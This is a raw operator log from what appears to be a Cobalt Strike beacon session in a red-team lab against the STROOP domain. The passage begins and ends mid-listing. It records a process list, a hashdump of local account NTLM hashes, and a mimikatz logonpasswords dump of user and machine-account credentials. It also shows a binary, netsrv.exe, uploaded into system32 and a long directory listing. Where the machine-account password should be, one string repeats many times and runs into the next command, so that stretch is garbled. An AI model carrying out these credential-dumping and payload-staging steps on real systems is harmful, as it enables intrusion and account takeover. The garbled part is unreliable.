5660 x64 NT AUTHORITY\LOCAL SERVICE 0 +WaSecAgentProv.exe 3220 5292 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 5292 5344 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 6080 x64 NT AUTHORITY\LOCAL SERVICE 0 +SgrmBroker.exe 692 4980 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 5308 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 152 x64 NT AUTHORITY\LOCAL SERVICE 0 +SearchIndexer.exe 692 68 x64 NT AUTHORITY\SYSTEM 0 +SecurityHealthService.exe 692 4244 x64 NT AUTHORITY\SYSTEM 0 +csrss.exe 3956 5484 x64 NT AUTHORITY\SYSTEM 2 +winlogon.exe 3956 1688 x64 NT AUTHORITY\SYSTEM 2 +fontdrvhost.exe 1688 2108 x64 Font Driver Host\UMFD-2 2 +dwm.exe 1688 5416 x64 Window Manager\DWM-2 2 +rdpclip.exe 972 5620 x64 STROOP\W.Trommel 2 +sihost.exe 1476 5172 x64 STROOP\W.Trommel 2 +svchost.exe 692 2284 x64 STROOP\W.Trommel 2 +svchost.exe 692 5800 x64 STROOP\W.Trommel 2 +taskhostw.exe 1168 1932 x64 STROOP\W.Trommel 2 +svchost.exe 692 5580 x64 NT AUTHORITY\SYSTEM 0 +powershell.exe 1168 5472 x64 STROOP\W.Trommel 2 +svchost.exe 692 5364 x64 NT AUTHORITY\SYSTEM 0 +svchost.exe 692 4160 x64 NT AUTHORITY\SYSTEM 0 +ctfmon.exe 5364 4844 x64 STROOP\W.Trommel 2 +explorer.exe 4204 5992 x64 STROOP\W.Trommel 2 +svchost.exe 692 1776 x64 STROOP\W.Trommel 2 +svchost.exe 692 3956 x64 NT AUTHORITY\SYSTEM 0 +conhost.exe 5472 6208 x64 STROOP\W.Trommel 2 +ShellExperienceHost.exe 916 6248 x64 STROOP\W.Trommel 2 +SearchUI.exe 916 6440 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6520 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 6732 x64 STROOP\W.Trommel 2 +powershell.exe 5472 6976 x64 STROOP\W.Trommel 2 +conhost.exe 6976 6992 x64 STROOP\W.Trommel 2 +powershell.exe 5472 7112 x64 STROOP\W.Trommel 2 +conhost.exe 7112 7124 x64 STROOP\W.Trommel 2 +RuntimeBroker.exe 916 1380 x64 STROOP\W.Trommel 2 +iexplore.exe 916 2836 x64 STROOP\W.Trommel 2 +iexplore.exe 2836 6988 x86 STROOP\W.Trommel 2 +smartscreen.exe 916 7236 x64 STROOP\W.Trommel 2 +SecurityHealthSystray.exe 5992 7284 x64 STROOP\W.Trommel 2 +svchost.exe 692 7508 x64 NT AUTHORITY\SYSTEM 0 +LogonUI.exe 1688 2440 x64 NT AUTHORITY\SYSTEM 2 +svchost.exe 692 7396 x64 STROOP\W.Trommel 2 +svchost.exe 692 5280 x64 NT AUTHORITY\LOCAL SERVICE 0 +dllhost.exe 916 8172 x64 STROOP\W.Trommel 2 +SearchProtocolHost.exe 68 6864 x64 STROOP\W.Trommel 2 +FlashUtil_ActiveX.exe 916 6096 x64 STROOP\W.Trommel 2 +SearchProtocolHost.exe 68 4112 x64 NT AUTHORITY\SYSTEM 0 +wsmprovhost.exe 916 4164 x64 STROOP\W.Tax 0 +SearchFilterHost.exe 68 2992 x64 NT AUTHORITY\SYSTEM 0 + + +03/30 08:44:33 UTC [input] hashdump +03/30 08:44:33 UTC [task] Tasked beacon to dump hashes +03/30 08:44:37 UTC [checkin] host called home, sent: 82501 bytes +03/30 08:44:38 UTC [output] +received password hashes: +bofh:500:aad3b435b51404eeaad3b435b51404ee:e2fb4576f49d1badae64eeb8cd050e19::: +DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9480a886367fa07551dceadca7c741da::: + + +03/30 08:44:42 UTC [input] logonpasswords +03/30 08:44:42 UTC [task] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command +03/30 08:44:43 UTC [checkin] host called home, sent: 417362 bytes +03/30 08:44:44 UTC [output] +received output: + +Authentication Id : 0 ; 1187171 (00000000:00121d63) +Session : RemoteInteractive from 2 +User Name : w.trommel +Domain : STROOP +Logon Server : S-WIN22 +Logon Time : 3/30/2020 8:36:40 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4709 + msv : + [00000003] Primary + * Username : W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : e4c81fcb4b66f54c7d549fb446425a9c + tspkg : + wdigest : + * Username : W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : W.Trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1187067 (00000000:00121cfb) +Session : RemoteInteractive from 2 +User Name : w.trommel +Domain : STROOP +Logon Server : S-WIN22 +Logon Time : 3/30/2020 8:36:40 AM +SID : S-1-5-21-2163199188-2306780613-1636707950-4709 + msv : + [00000003] Primary + * Username : W.Trommel + * Domain : STROOP + * NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7 + * DPAPI : e4c81fcb4b66f54c7d549fb446425a9c + tspkg : + wdigest : + * Username : W.Trommel + * Domain : STROOP + * Password : (null) + kerberos : + * Username : w.trommel + * Domain : STROOP.LOCAL + * Password : (null) + ssp : + credman : + +Authentication Id : 0 ; 1155726 (00000000:0011a28e) +Session : Interactive from 2 +User Name : DWM-2 +Domain : Window Manager +Logon Server : (null) +Logon Time : 3/30/2020 8:36:40 AM +SID : S-1-5-90-0-2 + msv : + [00000003] Primary + * Username : L-WIN224$ + * Domain : STROOP + * NTLM : b7fdacb33b890f235bf7e107ecf00d41 + * SHA1 : 81d84bb5789059ccca5504e4fb218b243ce2e820 + tspkg : + wdigest : + * Username : L-WIN224$ + * Domain : STROOP + * Password : (null) + kerberos : + * Username : L-WIN224$ + * Domain : stroop.local + * Password : kfB2!9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v pwd +03/30 08:51:19 UTC [task] <> Tasked beacon to print working directory +03/30 08:51:21 UTC [checkin] host called home, sent: 8 bytes +03/30 08:51:22 UTC [output] +Current directory is C:\windows\system32 + +03/30 08:52:03 UTC [input] upload +03/30 08:52:11 UTC [task] <> Tasked beacon to upload C:\Users\outflank\Desktop\netsrv.exe as netsrv.exe +03/30 08:52:11 UTC [indicator] file: a1a6090d13b60164ca3481dabf8cba86 289280 bytes netsrv.exe +03/30 08:52:15 UTC [checkin] host called home, sent: 289302 bytes +03/30 08:52:21 UTC [input] ls netsrv.exe +03/30 08:52:21 UTC [task] <> Tasked beacon to list files in netsrv.exe +03/30 08:52:25 UTC [checkin] host called home, sent: 28 bytes +03/30 08:52:25 UTC [error] could not open netsrv.exe\*: 267 +03/30 08:52:27 UTC [input] ls +03/30 08:52:27 UTC [task] <> Tasked beacon to list files in . +03/30 08:52:30 UTC [checkin] host called home, sent: 19 bytes +03/30 08:52:30 UTC [output] +C:\windows\system32\* +D 0 03/30/2020 08:52:15 . +D 0 03/30/2020 08:52:15 .. +D 0 09/15/2018 09:07:52 0409 +F 232 09/15/2018 07:28:43 @AppHelpToast.png +F 308 09/15/2018 07:28:42 @AudioToastIcon.png +F 450 09/15/2018 07:28:30 @BackgroundAccessToastIcon.png +F 199 09/15/2018 07:28:50 @bitlockertoastimage.png +F 14791 09/15/2018 07:28:50 @edptoastimage.png +F 330 09/15/2018 07:28:51 @EnrollmentToastIcon.png +F 563 09/15/2018 07:28:53 @language_notification_icon.png +F 483 09/15/2018 07:29:21 @optionalfeatures.png +F 404 09/15/2018 07:28:56 @VpnToastIcon.png +F 15106 09/15/2018 07:28:26 @WiFiNotificationIcon.png +F 195443 09/15/2018 07:29:13 @windows-hello-V4.1.gif +F 714 09/15/2018 07:29:13 @WindowsHelloFaceToastIcon.png +F 518 09/15/2018 07:28:39 @WindowsUpdateToastIcon.contrast-black.png +F 810 09/15/2018 07:28:39 @WindowsUpdateToastIcon.contrast-white.png +F 518 09/15/2018 07:28:39 @WindowsUpdateToastIcon.png +F 691 09/15/2018 07:29:14 @WirelessDisplayToast.png +F 155 09/15/2018 07:28:36 @WwanNotificationIcon.png +F 352 09/15/2018 07:28:36 @WwanSimLockIcon.png +F 196608 09/15/2018 07:28:30 aadauthhelper.dll +F 692736 03/07/2020 00:53:37 aadcloudap.dll +F 68096 09/15/2018 07:28:38 aadjcsp.dll +F 1824768 03/07/2020 00:53:37 aadtb.dll +F 145720 09/15/2018 07:28:30 aadWamExtension.dll +F 413200 09/15/2018 07:28:56 AboutSettingsHandlers.dll +F 400384 03/07/2020 00:53:43 AboveLockAppHost.dll +F 3838976 09/15/2018 07:28:42 accessibilitycpl.dll +F 273408 09/14/2018 17:59:00 accountaccessor.dll +F 441856 09/14/2018 17:58:00 AccountsRt.dll +F 350208 03/07/2020 00:54:17 AcGenral.dll +F 314368 03/07/2020 00:54:16 AcLayers.dll +F 11264 09/15/2018 07:29:14 acledit.dll +F 5504000 09/15/2018 07:29:14 aclui.dll +F 324624 03/07/2020 00:53:51 acmigration.dll +F 200192 03/07/2020 00:53:38 ACPBackgroundManagerPolicy.dll +F 82432 09/15/2018 07:28:42 acppage.dll +F 12800 09/15/2018 07:29:14 acproxy.dll +F 65024 09/15/2018 07:29:22 AcSpecfc.dll +F 313856 09/15/2018 07:28:51 ActionCenter.dll +F 560640 09/15/2018 07:28:52 ActionCenterCPL.dll +F 72704 09/15/2018 07:28:57 ActionMgr.dll +F 188928 09/15/2018 07:28:59 ActionQueue.dll +F 55808 09/15/2018 07:28:30 ActivationClient.dll +F 690176 03/07/2020 00:53:38 ActivationManager.dll +F 265728 09/15/2018 07:28:43 activeds.dll +F 112128 09/15/2018 07:28:43 activeds.tlb +F 101376 03/07/2020 00:54:28 ActiveSyncCsp.dll +F 1819136 09/14/2018 17:49:00 ActiveSyncProvider.dll +F 612864 09/15/2018 07:28:50 actxprxy.dll +F 32768 09/15/2018 07:29:24 AcWinRT.dll +F 15360 09/15/2018 07:29:22 AcXtrnal.dll +F 1300480 09/15/2018 07:28:30 AdaptiveCards.dll +F 67584 09/15/2018 07:28:36 AddressParser.dll +F 24064 09/15/2018 07:28:56 adhapi.dll +F 97792 09/15/2018 07:28:56 adhsvc.dll +F 534528 09/15/2018 09:10:02 AdmTmpl.dll +F 58368 09/15/2018 07:29:14 adprovider.dll +F 136192 09/15/2018 09:10:00 adrclient.dll +F 249344 09/15/2018 07:29:14 adsldp.dll +F 252928 09/15/2018 07:28:43 adsldpc.dll +F 101376 09/15/2018 07:29:14 adsmsext.dll +F 351232 09/15/2018 07:29:16 adsnt.dll +F 844288 09/15/2018 07:28:46 adtschema.dll +F 145408 03/07/2020 00:53:31 AdvancedEmojiDS.dll +D 0 09/15/2018 07:34:00 AdvancedInstallers +F 659720 09/15/2018 07:28:26 advapi32.dll +F 2560 09/15/2018 07:28:25 advapi32res.dll +F 144384 09/15/2018 07:28:51 advpack.dll +F 30720 09/15/2018 07:28:42 aeevts.dll +F 747536 03/07/2020 00:53:51 aeinv.dll +F 513544 03/07/2020 00:53:26 aepic.dll +F 1188352 03/07/2020 00:53:30 AgentService.exe +F 2871824 03/07/2020 00:53:51 aitstatic.exe +F 25088 09/15/2018 07:28:30 AJRouter.dll +F 94720 09/15/2018 07:28:38 alg.exe +F 162816 09/15/2018 07:29:14 altspace.dll +D 0 09/15/2018 07:34:00 am-et +F 18944 09/15/2018 09:08:37 amcompat.tlb +F 65536 09/15/2018 07:28:26 amsi.dll +F 14848 09/15/2018 07:28:26 amsiproxy.dll +F 97792 09/15/2018 07:29:21 amstream.dll +F 41984 09/15/2018 07:29:24 AnalogCommonProxyStub.dll +F 251904 09/15/2018 07:29:17 apds.dll +F 71680 09/14/2018 18:03:00 APHostClient.dll +F 16384 09/14/2018 18:03:00 APHostRes.dll +F 329728 09/14/2018 17:57:00 APHostService.dll +F 87040 03/07/2020 00:53:38 ApiSetHost.AppExecutionAlias.dll +F 116536 09/15/2018 07:28:25 apisetschema.dll +F 1267712 03/07/2020 00:53:44 APMon.dll +F 928768 03/07/2020 00:53:37 AppContracts.dll +F 178176 09/15/2018 07:28:29 AppExtension.dll +F 553984 03/07/2020 00:53:50 apphelp.dll +F 33792 09/15/2018 07:28:43 Apphlpdm.dll +F 114176 09/15/2018 07:28:30 AppHostRegistrationVerifier.exe +F 64784 09/15/2018 07:28:42 appidapi.dll +F 19456 09/15/2018 07:28:42 appidcertstorecheck.exe +F 158720 09/15/2018 07:28:42 appidpolicyconverter.exe +F 404480 09/15/2018 09:10:02 AppIdPolicyEngineApi.dll +F 78336 09/15/2018 07:28:42 appidsvc.dll +F 25600 09/15/2018 07:28:42 appidtel.exe +F 176640 03/07/2020 00:53:37 appinfo.dll +F 12288 09/15/2018 07:28:52 appinfoext.dll +F 669184 03/07/2020 00:53:48 ApplicationFrame.dll +F 72984 03/07/2020 00:53:48 ApplicationFrameHost.exe +D 0 09/15/2018 07:33:50 AppLocker +F 382976 03/07/2020 00:53:51 AppLockerCSP.dll +F 1128960 03/07/2020 00:53:30 ApplySettingsTemplateCatalog.exe +F 1054712 03/07/2020 00:53:36 ApplyTrustOffline.exe +F 150016 09/15/2018 09:09:56 AppManagementConfiguration.dll +F 198656 09/15/2018 09:09:59 appmgmts.dll +F 448512 09/15/2018 09:10:00 appmgr.dll +F 112128 09/15/2018 07:29:25 AppMon.dll +F 143360 09/15/2018 07:28:36 AppointmentActivation.dll +F 779264 09/15/2018 07:28:34 AppointmentApis.dll +D 0 03/07/2020 00:55:54 appraiser +F 1726480 03/07/2020 00:53:51 appraiser.dll +F 679424 03/07/2020 00:53:30 AppReadiness.dll +F 12800 09/15/2018 07:28:42 apprepapi.dll +F 590336 03/07/2020 00:53:49 AppResolver.dll +F 238592 09/15/2018 07:28:24 ApproveChildRequest.exe +F 178176 03/07/2020 00:53:37 appsruprov.dll +D 0 09/15/2018 09:10:11 AppV +F 667152 03/07/2020 00:53:30 AppVCatalog.dll +F 831800 03/07/2020 00:53:29 AppVClient.exe +F 224256 09/15/2018 09:10:00 AppvClientEventLog.dll +F 41488 09/15/2018 09:09:58 AppVClientPS.dll +F 182288 09/15/2018 09:10:04 AppVDllSurrogate.exe +F 817168 03/07/2020 00:53:30 AppVEntStreamingManager.dll +F 1399824 03/07/2020 00:53:30 AppVEntSubsystemController.dll +F 2200376 03/07/2020 00:53:29 AppVEntSubsystems64.dll +F 1715000 03/07/2020 00:53:30 AppVEntVirtualization.dll +F 133632 09/15/2018 09:10:04 appvetwclientres.dll +F 224256 09/15/2018 09:10:00 appvetwsharedperformance.dll +F 13824 09/15/2018 09:10:04 appvetwstreamingux.dll +F 258064 09/15/2018 09:10:04 AppVFileSystemMetadata.dll +F 1612816 03/07/2020 00:53:30 AppVIntegration.dll +F 959504 09/15/2018 09:10:04 AppVManifest.dll +F 173064 09/15/2018 09:10:04 AppVNice.exe +F 828216 03/07/2020 00:53:30 AppVOrchestration.dll +F 1045008 09/15/2018 09:10:04 AppVPolicy.dll +F 649528 03/07/2020 00:53:30 AppVPublishing.dll +F 743224 03/07/2020 00:53:30 AppVReporting.dll +F 396088 03/07/2020 00:53:29 AppVScripting.dll +F 15160 09/15/2018 09:09:59 AppVSentinel.dll +F 231440 09/15/2018 09:10:04 AppVShNotify.exe +F 202768 09/15/2018 09:10:04 AppVStreamingUX.dll +F 228664 09/15/2018 09:10:04 AppVStreamMap.dll +F 20488 09/15/2018 09:09:58 AppVTerminator.dll +F 918528 09/15/2018 07:29:14 appwiz.cpl +F 349696 03/07/2020 00:53:36 AppxAllUserStore.dll +F 207360 09/15/2018 07:28:26 AppXApplicabilityBlob.dll +F 225280 09/15/2018 07:28:26 AppxApplicabilityEngine.dll +F 863528 03/07/2020 00:53:25 AppXDeploymentClient.dll +F 1608192 03/07/2020 00:53:35 AppXDeploymentExtensions.desktop.dll +F 2197504 03/07/2020 00:53:35 AppXDeploymentExtensions.onecore.dll +F 3392000 03/07/2020 00:53:35 AppXDeploymentServer.dll +F 1662264 03/07/2020 00:53:25 AppxPackaging.dll +F 3022 09/15/2018 07:28:29 AppxProvisioning.xml +F 270848 09/15/2018 07:28:36 AppxSip.dll +F 19968 09/15/2018 07:28:34 AppxStreamingDataSourcePS.dll +F 126976 03/07/2020 00:53:36 AppxSysprep.dll +D 0 09/15/2018 09:09:27 ar-SA +F 622080 09/15/2018 07:29:14 archiveint.dll +F 26112 09/15/2018 07:29:14 ARP.EXE +F 2560 09/15/2018 07:29:36 asferror.dll +F 30880 09/15/2018 07:29:50 aspnet_counters.dll +F 486400 03/07/2020 00:54:22 AssignedAccessCsp.dll +F 629248 03/07/2020 00:54:22 AssignedAccessManager.dll +F 936960 03/07/2020 00:54:22 assignedaccessmanagersvc.dll +F 10240 09/15/2018 09:09:57 assignedaccessproviderevents.dll +F 60416 03/07/2020 00:53:38 AssignedAccessRuntime.dll +F 78336 09/15/2018 09:09:59 AssignedAccessShellProxy.dll +F 89088 09/15/2018 07:28:55 asycfilt.dll +F 30720 09/15/2018 07:28:45 at.exe +F 78848 09/15/2018 07:28:42 AtBroker.exe +F 96768 09/15/2018 07:28:44 atl.dll +F 40960 09/15/2018 07:28:30 atlthunk.dll +F 47616 03/07/2020 00:53:55 atmlib.dll +F 21504 09/15/2018 07:29:16 attrib.exe +F 604552 03/07/2020 00:53:31 audiodg.exe +F 750080 03/07/2020 00:53:31 AudioEndpointBuilder.dll +F 2086192 03/07/2020 00:53:31 AudioEng.dll +F 359424 09/15/2018 07:28:56 AudioHandlers.dll +F 419112 09/15/2018 07:28:20 AUDIOKSE.dll +F 57344 09/15/2018 07:28:20 audioresourceregistrar.dll +F 1331536 03/07/2020 00:53:31 AudioSes.dll +F 1929728 03/07/2020 00:53:31 audiosrv.dll +F 347784 03/07/2020 00:53:31 AudioSrvPolicyManager.dll +F 199168 09/15/2018 07:28:57 auditcse.dll +F 223232 09/15/2018 09:10:05 AuditNativeSnapIn.dll +F 35328 09/15/2018 07:29:14 auditpol.exe +F 71680 09/15/2018 07:29:14 auditpolcore.dll +F 74240 09/15/2018 09:10:05 AuditPolicyGPInterop.dll +F 95744 09/15/2018 09:10:05 auditpolmsg.dll +F 206848 03/07/2020 00:53:37 AuthBroker.dll +F 110592 09/15/2018 07:28:45 AuthBrokerUI.dll +F 52224 09/15/2018 07:29:13 authentication.dll +F 67072 09/15/2018 07:28:57 AuthExt.dll +F 526848 09/15/2018 07:29:19 authfwcfg.dll +F 305152 09/15/2018 07:28:51 AuthFWGP.dll +F 5107200 09/15/2018 07:28:51 AuthFWSnapin.dll +F 112640 09/15/2018 07:28:51 AuthFWWizFwk.dll +F 138624 09/15/2018 07:28:38 AuthHost.exe +F 18944 09/15/2018 07:28:38 AuthHostProxy.dll +F 504832 09/15/2018 07:28:44 authui.dll +F 286720 09/15/2018 07:28:46 authz.dll +F 956416 09/15/2018 07:28:42 autochk.exe +F 934400 09/15/2018 07:29:14 autoconv.exe +F 908800 09/15/2018 07:29:14 autofmt.exe +F 187392 09/15/2018 07:28:25 autopilot.dll +F 165888 09/15/2018 07:29:14 autoplay.dll +F 138092 09/15/2018 07:28:22 AverageRoom.bin +F 79872 09/15/2018 07:29:22 avicap32.dll +F 115712 09/15/2018 07:29:22 avifil32.dll +F 30664 09/15/2018 07:28:20 avrt.dll +F 112128 03/07/2020 00:53:43 AxInstSv.dll +F 60416 09/15/2018 07:28:53 AxInstUI.exe +F 41587 09/15/2018 07:29:21 azman.msc +F 892928 09/15/2018 07:29:14 azroles.dll +F 427520 09/15/2018 07:29:21 azroleui.dll +F 31232 09/15/2018 07:29:14 AzSqlExt.dll +F 1918464 03/07/2020 00:53:46 AzureSettingSyncProvider.dll +F 112640 09/15/2018 09:10:03 baaupdate.exe +F 67072 09/15/2018 07:28:38 BackgroundMediaPolicy.dll +F 19768 09/15/2018 07:28:36 backgroundTaskHost.exe +F 37376 09/15/2018 07:28:26 BackgroundTransferHost.exe +F 15872 09/15/2018 07:28:29 BamSettingsClient.dll +F 89088 03/07/2020 00:53:33 BarcodeProvisioningPlugin.dll +F 210432 09/15/2018 07:28:59 basecsp.dll +F 65024 09/15/2018 07:28:45 basesrv.dll +F 1669632 09/15/2018 07:28:24 batmeter.dll +F 260608 09/15/2018 07:28:29 bcastdvr.proxy.dll +F 107520 09/15/2018 07:28:29 BcastDVRBroker.dll +F 480768 09/15/2018 07:28:29 BcastDVRClient.dll +F 234496 09/15/2018 07:28:29 BcastDVRCommon.dll +F 1388032 03/07/2020 00:54:08 bcastdvruserservice.dll +F 122592 09/15/2018 07:28:46 bcd.dll +F 241664 09/15/2018 07:28:22 bcdboot.exe +F 482104 03/07/2020 00:53:26 bcdedit.exe +F 76800 09/15/2018 07:28:22 bcdprov.dll +F 87040 09/15/2018 07:28:22 bcdsrv.dll +F 367208 03/07/2020 00:53:25 BCP47Langs.dll +F 159816 09/15/2018 07:28:34 BCP47mrm.dll +F 143632 09/15/2018 07:28:45 bcrypt.dll +F 515440 03/07/2020 00:53:54 bcryptprimitives.dll +F 97280 09/15/2018 07:29:24 bdaplgin.ax +F 372224 03/07/2020 00:54:25 bdechangepin.exe +F 133120 09/15/2018 09:09:57 BdeHdCfg.exe +F 103424 09/15/2018 09:09:57 BdeHdCfgLib.dll +F 50176 09/15/2018 09:10:00 bderepair.dll +F 454144 03/07/2020 00:54:25 bdesvc.dll +F 11776 09/15/2018 09:10:01 BdeSysprep.dll +F 34304 09/15/2018 09:10:04 bdeui.dll +F 53760 09/15/2018 09:09:55 BdeUISrv.exe +F 290984 09/15/2018 09:10:05 bdeunlock.exe +F 882688 03/07/2020 00:53:40 BFE.DLL +D 0 09/15/2018 09:09:27 bg-BG +F 29696 09/15/2018 07:28:34 bi.dll +F 65536 09/15/2018 07:28:25 bidispl.dll +F 389120 03/07/2020 00:53:28 BingASDS.dll +F 97792 03/07/2020 00:53:28 BingFilterDS.dll +F 9670656 03/07/2020 00:53:41 BingMaps.dll +F 902144 03/07/2020 00:53:42 BingOnlineServices.dll +F 348160 03/07/2020 00:53:42 BioCredProv.dll +F 805504 03/07/2020 00:54:08 BioIso.exe +F 835584 03/07/2020 00:53:42 bisrv.dll +F 224768 03/07/2020 00:53:58 BitLockerCsp.dll +F 141312 09/15/2018 09:09:58 BitLockerDeviceEncryption.exe +F 102400 09/15/2018 09:10:01 BitLockerWizard.exe +F 102400 09/15/2018 09:10:01 BitLockerWizardElev.exe +F 211456 09/15/2018 07:28:42 bitsadmin.exe +F 81920 09/15/2018 07:28:44 bitsigd.dll +F 30208 09/15/2018 07:28:30 bitsperf.dll +F 64512 09/15/2018 07:28:30 BitsProxy.dll +F 320728 03/07/2020 00:53:42 biwinrt.dll +F 77824 09/15/2018 07:29:46 BlbEvents.dll +F 2560 09/15/2018 07:29:54 blbres.dll +F 66560 09/15/2018 07:29:54 blb_ps.dll +F 198144 09/15/2018 07:28:36 BluetoothApis.dll +F 65536 09/15/2018 07:28:56 BluetoothDesktopHandlers.dll +F 8495 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-black.png +F 8736 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-high.png +F 8495 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-white.png +F 8541 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.png +F 1320 09/15/2018 07:28:22 BluetoothSystemToastIcon.contrast-white.png +F 1229 09/15/2018 07:28:22 BluetoothSystemToastIcon.png +F 19456 09/15/2018 07:28:22 bnmanager.dll +D 0 03/07/2020 00:55:54 Boot +F 3170304 09/15/2018 07:28:29 boot.sdi +F 93184 09/15/2018 07:28:22 bootcfg.exe +F 26112 09/15/2018 07:29:46 bootim.exe +F 657408 03/07/2020 00:53:36 BootMenuUX.dll +F 108048 09/15/2018 07:28:22 bootsect.exe +F 3072 09/15/2018 07:28:42 bootstr.dll +F 3978240 03/07/2020 00:53:51 bootux.dll +F 26112 09/15/2018 07:28:46 BOOTVID.DLL +F 22984 09/15/2018 07:29:22 bopomofo.uce +F 2560 09/15/2018 07:29:16 bridgeres.dll +F 20480 09/15/2018 07:29:16 bridgeunattend.exe +F 244736 09/15/2018 07:28:29 BrokerLib.dll +F 57344 09/15/2018 07:28:26 browcli.dll +F 282424 03/07/2020 00:53:31 browserbroker.dll +F 147968 09/15/2018 07:28:42 browserexport.exe +F 144896 09/15/2018 07:28:26 BrowserSettingSync.dll +F 47136 03/07/2020 00:53:31 browser_broker.exe +F 14848 09/15/2018 07:28:58 browseui.dll +F 556544 03/07/2020 00:53:43 BTAGService.dll +F 381952 03/07/2020 00:53:43 BthAvctpSvc.dll +F 351744 03/07/2020 00:53:43 BthAvrcp.dll +F 61952 09/15/2018 07:28:38 BthAvrcpAppSvc.dll +F 115712 09/15/2018 07:28:43 bthci.dll +F 33792 09/15/2018 07:29:14 BthMtpContextHandler.dll +F 31232 09/15/2018 07:28:42 bthpanapi.dll +F 185856 09/15/2018 07:28:42 BthpanContextHandler.dll +D 0 09/15/2018 07:34:00 Bthprops +F 261632 03/07/2020 00:53:51 bthprops.cpl +F 106496 09/15/2018 07:28:38 BthRadioMedia.dll +F 197120 03/07/2020 00:53:43 bthserv.dll +F 31232 09/15/2018 07:28:36 BthTelemetry.dll +F 40448 09/15/2018 07:28:42 bthudtask.exe +F 123904 09/15/2018 07:28:42 btpanui.dll +F 807424 09/15/2018 07:29:21 Bubbles.scr +F 67072 09/15/2018 07:29:16 BWContextHandler.dll +F 64000 09/15/2018 07:28:29 ByteCodeGenerator.exe +F 101888 09/15/2018 07:28:44 cabapi.dll +F 143088 09/15/2018 07:28:44 cabinet.dll +F 166912 09/15/2018 07:28:44 cabview.dll +F 33280 09/15/2018 07:29:23 cacls.exe +F 27648 09/15/2018 07:29:22 calc.exe +F 86016 09/15/2018 07:28:20 CallButtons.dll +F 28160 09/15/2018 07:28:20 CallButtons.ProxyStub.dll +F 178176 09/15/2018 07:28:36 CallHistoryClient.dll +F 128000 09/15/2018 07:28:30 CameraCaptureUI.dll +F 32200 09/15/2018 09:09:56 CameraSettingsUIHost.exe +F 35328 09/15/2018 07:28:30 canonurl.dll +F 64512 09/15/2018 07:28:30 CapabilityAccessHandlers.dll +F 292352 03/07/2020 00:53:38 CapabilityAccessManager.dll +F 109568 03/07/2020 00:53:38 CapabilityAccessManagerClient.dll +F 332144 09/15/2018 07:28:29 capauthz.dll +F 61952 09/15/2018 07:29:14 capiprovider.dll +F 25600 09/15/2018 07:28:50 capisp.dll +F 122880 09/15/2018 07:28:42 CaptureService.dll +F 148992 03/07/2020 00:54:09 CastingShellExt.dll +F 94208 09/15/2018 07:29:14 CastLaunch.dll +F 60968 09/15/2018 07:29:14 CastSrv.exe +D 0 09/15/2018 07:33:50 CatRoot +D 0 03/30/2020 07:41:16 catroot2 +F 463872 09/15/2018 07:28:43 catsrv.dll +F 50176 09/15/2018 07:28:42 catsrvps.dll +F 508928 09/15/2018 07:28:44 catsrvut.dll +F 961024 03/07/2020 00:54:11 CBDHSvc.dll +F 91136 09/15/2018 07:29:23 cca.dll +F 266240 09/15/2018 07:28:32 cdd.dll +F 1065984 09/15/2018 07:29:19 cdosys.dll +F 5301248 03/07/2020 00:53:38 cdp.dll +F 1794048 03/07/2020 00:53:38 cdprt.dll +F 650240 03/07/2020 00:53:38 cdpsvc.dll +F 515584 03/07/2020 00:53:38 cdpusersvc.dll +F 741376 09/15/2018 07:28:25 CellularAPI.dll +F 45056 09/15/2018 07:28:25 cellulardatacapabilityhandler.dll +F 249856 09/15/2018 07:28:36 cemapi.dll +F 34816 09/15/2018 07:28:22 cero.rs +F 800768 09/15/2018 07:28:30 certca.dll +F 463872 09/15/2018 07:28:30 certcli.dll +F 329216 09/15/2018 07:28:51 certCredProvider.dll +F 66560 09/15/2018 07:29:22 certenc.dll +F 3198976 03/07/2020 00:53:26 CertEnroll.dll +F 51712 09/15/2018 07:28:30 CertEnrollCtrl.exe +F 328704 09/15/2018 07:29:21 CertEnrollUI.dll +F 63081 09/15/2018 07:29:21 certlm.msc +F 2192896 09/15/2018 07:29:21 certmgr.dll +F 63070 09/15/2018 07:29:21 certmgr.msc +F 62464 09/15/2018 07:29:22 CertPKICmdlet.dll +F 121344 09/15/2018 07:28:42 CertPolEng.dll +F 192512 09/15/2018 07:28:59 certprop.dll +F 522752 09/15/2018 07:29:22 certreq.exe +F 1652736 09/15/2018 07:29:22 certutil.exe +F 267776 09/15/2018 09:10:05 cewmdm.dll +F 77824 09/15/2018 07:28:44 cfgbkend.dll +F 293344 09/15/2018 07:28:46 cfgmgr32.dll +F 145408 09/15/2018 07:29:16 CfgSPCellular.dll +F 140288 09/15/2018 07:28:24 CfgSPPolicy.dll +F 99328 09/15/2018 07:28:42 cflapi.dll +F 40248 09/15/2018 07:29:13 